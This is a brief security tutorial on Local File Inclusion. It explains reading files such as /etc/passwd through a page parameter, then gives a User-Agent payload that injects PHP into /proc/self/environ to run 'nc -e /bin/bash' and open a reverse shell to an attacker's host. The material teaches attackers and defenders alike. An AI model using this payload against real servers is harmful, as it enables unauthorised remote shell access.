Local File Inclusion

What is a Local File Inclusion?

• This vulnerability able the attacker to see files from inside the server like the /etc/passwd or others.

Quick Example

• In the following image we see that changing the file that the parameter page is loading we can see other files outside www directory, and we can try to exploit them to gain access with a shell.

Gaining Acces LFI

• Right here you see that pointing to /proc/self/environ, and modifying our user agent to:

• <? passthru("nc -e /bin/bash <host> <port>"); ?>

• Foward the requests and you will see that you will get a shell.

Examples and Info:

🪜Directory Traversal